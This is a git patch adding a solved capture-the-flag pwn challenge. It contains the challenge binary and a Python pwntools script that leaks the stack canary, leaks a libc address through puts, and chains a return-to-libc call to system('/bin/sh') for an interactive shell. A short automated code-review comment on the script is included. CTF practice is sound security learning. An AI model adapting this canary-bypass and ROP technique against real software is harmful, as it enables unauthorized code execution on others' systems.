From 15ab81a884b7d07c9fa08ff30e6d01843d66b2c5 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Fri, 10 Sep 2021 13:39:08 +0800
Subject: [PATCH] Finished canary/pwn100
---
 canary/pwn100/answer.py | 52 ++++++++++++++++++++++++++++++++++++++++
 canary/pwn100/pwns | Bin 0 -> 5592 bytes
 canary/pwn100/test.py | 29 ++++++++++++++++++++++
 canary/pwn100/test.txt | 2 ++
 4 files changed, 83 insertions(+)
 create mode 100644 canary/pwn100/answer.py
 create mode 100755 canary/pwn100/pwns
 create mode 100644 canary/pwn100/test.py
 create mode 100644 canary/pwn100/test.txt
diff --git a/canary/pwn100/answer.py b/canary/pwn100/answer.py
new file mode 100644
index 0000000..ab0806c
--- /dev/null
+++ b/canary/pwn100/answer.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./pwns')
+elf = ELF('./pwns')
+
+# Canary Leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+confirm = "Y"
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+canary_payload = 257*'0' + '0'
+canary_payload = base64.b64encode(canary_payload)
+p.sendline(canary_payload)
+p.recv(0x10b)
+canary_value = u32(p.recv(4)) - 0x30
+print("Canary: " + hex(canary_value))
+
+# puts .got address leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+b64decode_func = 0x080487e6
+puts_leak_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(puts_plt) + p32(b64decode_func) + p32(puts_got)
+puts_leak_payload = base64.b64encode(puts_leak_payload)
+p.sendline(puts_leak_payload)
+
+p.recvuntil("Result is:\n")
+puts_libc = u32(p.recv(4))
+
+# Query LibcSearcher
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+
+# ROP to Shell
+retn_addr = 0x08048c27
+p.recvuntil("Give me some datas:\n\n")
+shell_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(system_libc) + p32(b64decode_func) + p32(binsh_libc)
+shell_payload = base64.b64encode(shell_payload)
+p.sendline(shell_payload)
+
+p.interactive()
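Review bot: `retn_addr = 0x08048c27` under `# ROP to Shell` is assigned but never read, and `from struct import pack` and `import os` are likewise unused (the explicit `pack` import also shadows the `pack` that `from pwn import *` brings in); drop them or add a comment saying why they are kept. The bare numeric constants `0x10b`, `0x30` and `b64decode_func = 0x080487e6` are unexplained magic numbers, so a one-line comment on each recording where the value came from would let the file be maintained if the binary is rebuilt. `log_level = "debug"` is left switched on in the `context(...)` call, which makes every run noisy for anyone executing the file as written. The shebang pins Python 2 and the payload expressions concatenate `str` with `p32(...)` results, which only works when both are the same type, so a short header comment stating that the script is Python-2-only would spare the next reader a TypeError under Python 3.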
diff --git a/canary/pwn100/pwns b/canary/pwn100/pwns new file mode 100755 index 0000000000000000000000000000000000000000..f971a75eee35bd3e86ce3202dff19d6b3d009ccd GIT binary patch literal 5592 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 um$9&Y#>X$f4)CfB610-fe*#T^)p<